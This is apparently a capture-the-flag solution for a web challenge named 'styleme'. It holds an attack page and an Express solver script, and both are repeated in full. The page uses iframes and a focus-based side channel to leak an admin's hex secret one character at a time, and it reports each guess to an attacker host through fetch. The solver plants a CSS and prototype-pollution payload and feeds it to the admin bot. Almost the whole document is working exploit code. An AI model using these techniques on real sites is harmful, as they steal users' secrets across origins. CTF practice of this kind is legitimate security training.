strellic/pwn.hbs

## pwn.hbs
<!DOCTYPE html>
<html>
    <body onblur="nop()">
        <h1>styleme solver</h1>
        <input type="text" id="focusforcer" /><br />
        <script>
            let $ = document.querySelector.bind(document);
            let yep = false;
            let done = false;

            let known = "{{known}}";

            let index = 0;
            let alphabet = "{{alphabet}}";

            const send = (data) => {
                fetch("{{host}}/log?info=" + data);
            }

            const reset = () => {
                $("#focusforcer").focus();
                return new Promise((r) => setTimeout(r, 50));
            };

            function nop() {
                yep = true;
            }

            const run = async () => {
                await reset();

                console.log("run", known, alphabet);

                yep = false;
                let c = alphabet.charAt(index);

                if(!c) {
                    send("finished");
                    return;
                }

                index++;

                let query = known + c;
                let frame = document.createElement("iframe");

                frame.src = "http://localhost/styles/search?user=admin&query=" + query + "&sdf=" + location.href;

                frame.style.width = "800px";
                frame.style.height = "600px";

                frame.onload = () => {
                    setTimeout(() => {
                        frame.src += "#back";
                    }, 200);
                    setTimeout(() => {
                        if(yep) {
                            send(`success_${query}`);
                            return;
                        }
                        else {
                            send(`fail_${query}`);
                        }
                        frame.remove();
                        run()
                    }, 400);
                };
                document.body.appendChild(frame);
            };

            run();
        </script>
    </body>
</html>

## solve.js
const express = require("express");
const nodeFetch = require("node-fetch");
const fetch = require('fetch-cookie')(nodeFetch);

const app = express();

const PORT = 80;
const HOST = "http://ngrok";
const TARGET = "https://styleme.be.ax";

let account = ["strellicsolve", "passwd"];

let id       = "";
let known    = "";
let alphabet = "0123456789abcdef";
let last = 0;

app.set("view engine", "hbs");

app.use((req, res, next) => {
    res.locals.host = HOST;
    res.locals.known = known;
    res.locals.alphabet = alphabet;

    console.log(req.originalUrl, res.locals.known, res.locals.alphabet);

    next();
});

app.get("/log", (req, res) => {
    if(req.query.info) {
        let info = `${req.query.info}`;

        console.log(info);

        if(info === "finished" && known.length !== 12) {
            alphabet = "0123456789abcdef";
            known = known.slice(0, -1);
        }
        else if(info.startsWith("fail_") && alphabet.startsWith(info.charAt(info.length - 1))) {
            let c = info.charAt(info.length - 1);
            alphabet = alphabet.replace(c, "");
        }
        else if(info.startsWith("success_") && alphabet.startsWith(info.charAt(info.length - 1))) {
            let c = info.charAt(info.length - 1);
            known += c;
            alphabet = "0123456789abcdef";
        }
    }
    res.end("recv");
});

app.get("/", (req, res) => res.render("pwn"));

let regex = /<a href="\/styles\/i\/(.*?)" class="btn btn-primary btn-sm">Install<\/a>/;

const start = async () => {
    await fetch(`${TARGET}/api/register`, {
        method: "POST",
        headers: {
            "Content-Type": "application/x-www-form-urlencoded"
        },
        body: `user=${encodeURIComponent(account[0])}&pass=${encodeURIComponent(account[1])}`
    });

    await fetch(`${TARGET}/api/login`, {
        method: "POST",
        headers: {
            "Content-Type": "application/x-www-form-urlencoded"
        },
        body: `user=${encodeURIComponent(account[0])}&pass=${encodeURIComponent(account[1])}`
    });

    if(!id) {
        let title = encodeURIComponent('yep payload');
        let css = encodeURIComponent('h5 + a#back { display: none }');
        let url = encodeURIComponent(HOST + `?\n__proto__: {"\\u0067lobal": 1}`);

        await fetch(`${TARGET}/api/create`, {
            method: "POST",
            headers: {
                "Content-Type": "application/x-www-form-urlencoded"
            },
            body: `title=${title}&css=${css}&url=${url}&hidden=yep`
        });

        let r = await fetch(`${TARGET}/styles/mine`);
        let text = await r.text();

        console.log(text);
        id = regex.exec(text)[1];
        console.log(`generated payload id: ${id}`);
    }

    pwn();
};

const pwn = async () => {
    while(true) {
        if(known.length === 12) {
            console.log("ding ding ding ding");
            console.log(known, known, known, known, known);
            break;
        }

        if(new Date() - last >= 20*1000) {
            console.log("sending a new payload!!!");
            last = new Date();

            await fetch(`${TARGET}/api/submit`, {
                method: "POST",
                headers: {
                    "Content-Type": "application/x-www-form-urlencoded"
                },
                body: `url=${encodeURIComponent(`${TARGET}/styles/i/${id}`)}`
            });
        }
        await new Promise((resolve, reject) => setTimeout(resolve, 1000));
    }
};

app.listen(PORT, () => {
    console.log(`listening on port ${PORT}`);
    start();
});
	<!DOCTYPE html>
	<html>
	<body onblur="nop()">
	<h1>styleme solver</h1>
	<input type="text" id="focusforcer" /><br />
	<script>
	let $ = document.querySelector.bind(document);
	let yep = false;
	let done = false;

	let known = "{{known}}";

	let index = 0;
	let alphabet = "{{alphabet}}";

	const send = (data) => {
	fetch("{{host}}/log?info=" + data);
	}

	const reset = () => {
	$("#focusforcer").focus();
	return new Promise((r) => setTimeout(r, 50));
	};

	function nop() {
	yep = true;
	}

	const run = async () => {
	await reset();

	console.log("run", known, alphabet);

	yep = false;
	let c = alphabet.charAt(index);

	if(!c) {
	send("finished");
	return;
	}

	index++;

	let query = known + c;
	let frame = document.createElement("iframe");

	frame.src = "http://localhost/styles/search?user=admin&query=" + query + "&sdf=" + location.href;

	frame.style.width = "800px";
	frame.style.height = "600px";

	frame.onload = () => {
	setTimeout(() => {
	frame.src += "#back";
	}, 200);
	setTimeout(() => {
	if(yep) {
	send(`success_${query}`);
	return;
	}
	else {
	send(`fail_${query}`);
	}
	frame.remove();
	run()
	}, 400);
	};
	document.body.appendChild(frame);
	};

	run();
	</script>
	</body>
	</html>
	const express = require("express");
	const nodeFetch = require("node-fetch");
	const fetch = require('fetch-cookie')(nodeFetch);

	const app = express();

	const PORT = 80;
	const HOST = "http://ngrok";
	const TARGET = "https://styleme.be.ax";

	let account = ["strellicsolve", "passwd"];

	let id = "";
	let known = "";
	let alphabet = "0123456789abcdef";
	let last = 0;

	app.set("view engine", "hbs");

	app.use((req, res, next) => {
	res.locals.host = HOST;
	res.locals.known = known;
	res.locals.alphabet = alphabet;

	console.log(req.originalUrl, res.locals.known, res.locals.alphabet);

	next();
	});

	app.get("/log", (req, res) => {
	if(req.query.info) {
	let info = `${req.query.info}`;

	console.log(info);

	if(info === "finished" && known.length !== 12) {
	alphabet = "0123456789abcdef";
	known = known.slice(0, -1);
	}
	else if(info.startsWith("fail_") && alphabet.startsWith(info.charAt(info.length - 1))) {
	let c = info.charAt(info.length - 1);
	alphabet = alphabet.replace(c, "");
	}
	else if(info.startsWith("success_") && alphabet.startsWith(info.charAt(info.length - 1))) {
	let c = info.charAt(info.length - 1);
	known += c;
	alphabet = "0123456789abcdef";
	}
	}
	res.end("recv");
	});

	app.get("/", (req, res) => res.render("pwn"));

	let regex = /<a href="\/styles\/i\/(.*?)" class="btn btn-primary btn-sm">Install<\/a>/;

	const start = async () => {
	await fetch(`${TARGET}/api/register`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded"
	},
	body: `user=${encodeURIComponent(account[0])}&pass=${encodeURIComponent(account[1])}`
	});

	await fetch(`${TARGET}/api/login`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded"
	},
	body: `user=${encodeURIComponent(account[0])}&pass=${encodeURIComponent(account[1])}`
	});

	if(!id) {
	let title = encodeURIComponent('yep payload');
	let css = encodeURIComponent('h5 + a#back { display: none }');
	let url = encodeURIComponent(HOST + `?\n__proto__: {"\\u0067lobal": 1}`);

	await fetch(`${TARGET}/api/create`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded"
	},
	body: `title=${title}&css=${css}&url=${url}&hidden=yep`
	});

	let r = await fetch(`${TARGET}/styles/mine`);
	let text = await r.text();

	console.log(text);
	id = regex.exec(text)[1];
	console.log(`generated payload id: ${id}`);
	}

	pwn();
	};

	const pwn = async () => {
	while(true) {
	if(known.length === 12) {
	console.log("ding ding ding ding");
	console.log(known, known, known, known, known);
	break;
	}

	if(new Date() - last >= 20*1000) {
	console.log("sending a new payload!!!");
	last = new Date();

	await fetch(`${TARGET}/api/submit`, {
	method: "POST",
	headers: {
	"Content-Type": "application/x-www-form-urlencoded"
	},
	body: `url=${encodeURIComponent(`${TARGET}/styles/i/${id}`)}`
	});
	}
	await new Promise((resolve, reject) => setTimeout(resolve, 1000));
	}
	};

	app.listen(PORT, () => {
	console.log(`listening on port ${PORT}`);
	start();
	});